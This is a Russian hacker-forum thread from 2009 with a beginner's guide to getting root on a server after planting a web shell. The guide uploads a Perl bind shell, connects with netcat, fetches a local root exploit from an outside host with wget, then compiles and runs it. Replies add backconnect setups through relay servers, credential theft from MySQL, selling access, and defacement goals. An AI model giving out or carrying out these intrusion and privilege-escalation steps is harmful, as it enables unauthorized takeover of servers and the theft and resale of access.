Способ получения прав root на сервере

Тема в разделе "Статьи", создана пользователем Hookman, 2 июн 2009.

  1. Hookman
    Hookman Guest
    [intro]​


    Сразу хочy сказать что эта статья для новичков, для тех кто раньше никогда с этим не сталкивался.

    Все скрипты и программы которые нам пригодятся

    [Начало]​

    Многие после заливки шелла не знают что делать с ним, некоторые их продают по-дешовке, не зная того что можно было бы получить рут и продать его еще дороже =)))
    Собственно мы сейчас будем рассматривать как получить рут =)
    И так поехали =)

    [Работаем с шеллом]​

    Вот мы нашли уязвимый сайтик, воспользовались багой, попали в админку и залили шелл =)
    Переходим в директорию /tmp.
    Теперь нам нужно залить бинд шелл для того что бы открыть порт 32767 на сервере который в дальнейшем сыграет большую роль.
    Так, заливаем bind_port.pl в директорию /tmp (естественно если нам позволяют права).
    После того как залили блинд шелл, его надо запустить следующей командой:

    Код:
    perl bind_port.pl
    Запустили, открылся порт =) Теперь нужно запустить программку netcat. Прописываем в ней адрес сайта, порт (нажимаем "Enter"), пример:

    Код:
    site.com 32762
    
    Сделали. Далее выполняем команду:

    Код:
    ls -al
    Появляется список файлов в нашей директории /tmp

    [Заливка и компиляция скрипта]​


    Прописываем в netcat следующeе:

    Код:
    wget http://vbs29.narod.ru/lam.c
    Ждем пару секунд пока загрузится. Когда загрузилось компилируем следующей командой:

    Код:
    gcc lam lam.c -static
    После того как скомпилировали, запускаем командой:

    Код:
    ./lam
    Выполняем команду id и видим:

    Код:
    uid=0|root|  gid=0|root|
    Поздравляю ))) Теперь у вас есть права root на сервере )))


    (c)whack.ru (c)YO$YA
    зы. Позволил себе подкорректировать орфографические ошибки ибо читать противно (с)hookman
    ​
     
    Последнее редактирование модератором: 3 июн 2009
    2 июн 2009
  2. onthar
    onthar Продвинутый
    Симпатии:
    224
    инструкция по применению сплойтов повышения прав.
     
    2 июн 2009
  3. Web-Evt
    Web-Evt Guest
    Hookman,
    утилита wget стоит не на каждом сервере - ее ставят руками =\ Врядли умный админ поставит на боевой сервак ненужную утилиту, которая только память занимает, ибо никому на реальном сервере не разрешат что-то качать с инета - занимать канал и ресурсы.
     
    2 июн 2009
  4. Hookman
    Hookman Guest
    1.не все админы умные
    2.=>(c)whack.ru (c)YO$YA
     
    2 июн 2009
  5. NetSky
    NetSky Guest
    Совсем нет. Подумай еще) Подняв рута, первое, получаешь доступ ко ВСЕМ сайтам на сервере, второе, получаешь доступ к контенту. А тут можно неплохо поднимать и в другом плане лаве, если с умом.

    По моему "бинд")

    При том что на любом практически серваке, будет стоять фаер и *** он тебе даст подрубиться к себе удаленно. Тут делается бэкконнект, чтобы фаер не палил.
    Смысл лить какие-то скрипты левые на перле, берешь обычный р57 или любой другой норм шелл и делаешь бэкконнект или там биндпорт.

    Хоть раз делал подобное? Неткат ставиться у себя на машине, и в нем прописывается "-l -n -v -p 3373", потом берется обыкновенный р57, лучше поновее (1.4) и открывается бэкконнект на свою тачку, на прописанный в неткате порт... И ты получаешь доступ к ссх удаленно, с правами нобади, как правило. Компилятся сплоиты, при том далеко не все работают подобным образом, нужно сперва инструкцию почтитать, хотя большинство работают именно так, просто сливая права рута на нобади)))

    Конечно можно не делать прямой коннект себе на тачку, согласитесь глупо, а залить неткат на левый сервер, скомпилировать, и через него уже делать бэкконнект к себе с целевого сервера.
     
    Последнее редактирование модератором: 3 июн 2009
    3 июн 2009
    1 человеку нравится это.
  6. VaD75
    VaD75 Guest
    29 авг 2009
  7. Ryvstar
    Ryvstar Новичок
    Симпатии:
    0
    ребята подскажите. Если у меня есть доступ к фтп, но я могу заливать файлы только в директории типа image с правами 777, а права 755 и ниже мне уже не доступны, то есть я могу скачивать файлы но не могу их заливать на сервер. Я пробывал ставить шел, но я не могу с помощью него прочитать файл shadow, пишет то не хватает прав.
    Подскажите что можно сделать чтобы я мог заливать файлы на сервер через фтп или Http или еще как. На сервер стоит Линукс, php4 и какой-то мускул(он меня не интересует).
    Если можно поподробнее.
    Заранее Благодарен!
     
    2 окт 2009
  8. PRosTo_LEva
    PRosTo_LEva Guest
    Есть шелы которые имеют функцию смены прав на папки и файлы но работает она очень редко. Ты попросту ограничен в правах, поэтому попытайся имея этот аккаунт украсть акк с более выгодными привилегиями. На мой взгляд альтернативного варианта назначения прав нет.

    В этом тебе как раз может помочь тот же MySQL. Если админ ***(профан в сетевой безопасности) то порой там пассы в открытом виде можно найти.
     
    2 окт 2009
  9. Ryvstar
    Ryvstar Новичок
    Симпатии:
    0
    Я так понимаю сплоиты здесь не помогут
     
    2 окт 2009
  10. PRosTo_LEva
    PRosTo_LEva Guest
    Быть может варианты всё же есть. Я могу ошибаться, но какую цель ты преследуешь? Если дефейс и там стоит CMS то тебе достаточна получить доступ до админки сайта. В этом тебе поможет снова таже самая БД
     
    2 окт 2009
  11. onthar
    onthar Продвинутый
    Симпатии:
    224
    сплойт повышения привелегий + бэкдор помогут)
     
    2 окт 2009
Загрузка...